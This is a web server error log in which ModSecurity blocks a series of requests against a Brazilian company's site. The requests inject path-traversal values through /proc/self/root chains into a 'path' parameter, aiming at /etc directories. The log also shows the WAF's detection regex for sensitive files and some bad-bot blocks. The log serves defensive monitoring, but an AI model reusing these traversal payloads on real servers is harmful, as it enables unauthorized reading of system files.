[Wed Mar 18 11:13:26.675376 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:36450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzBimAPhZkrhU8w4lyqgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:30.115006 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:36466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzCuoXxyEfFpUF8f9yZwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:31.398263 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:32782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzC-yqAr6etmhZHNrF1gAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:32.688730 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:32790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzDEzinOy1jxa1j4caggAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:34.011361 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:32792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzDuw_le52K8_3pV3ksQAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:35.407454 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:32804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzD-yqAr6etmhZHNrF2wAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:37.803213 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:32810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzEeyqAr6etmhZHNrF3gAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:39.090843 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:32812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzE0zinOy1jxa1j4cahQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:40.461449 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:34858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzFOyqAr6etmhZHNrF3wAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:43.439032 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.228.61:34138] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqzF8df6f5d65gmYZTafAAAAsQ"]
[Wed Mar 18 11:13:44.099563 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:34858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzGOyqAr6etmhZHNrF4wAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:45.495191 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:34870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzGQkwaGbbGflqUZAU6QAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:46.862648 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:34884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzGtY0UrI5A3LftIyxzAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:46.937979 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.244.43:47926] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqzGtY0UrI5A3LftIyxzQAAAYg"]
[Wed Mar 18 11:13:48.262767 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:34894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzHNY0UrI5A3LftIyxzwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:50.714361 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:56146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzHdY0UrI5A3LftIyx0wAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:52.242968 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:56156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzINa6ubjKNq_cu4afgAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:53.567243 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:56164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzISmAPhZkrhU8w4lyzgAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:13:54.844113 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:56180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzItY0UrI5A3LftIyx1wAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:03.883673 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:56190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzK9Y0UrI5A3LftIyx5AAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:04.297800 2026] [mime_magic:error] [pid 19507:tid 140411624429312] (70014)End of file found: [client 57.141.18.6:58506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:14:05.194544 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:50910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzLUzinOy1jxa1j4calAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:06.475040 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:50918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzLuyqAr6etmhZHNrF7AAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:12.211590 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:50922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzNPu8EFLIOrSqIpsJEQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
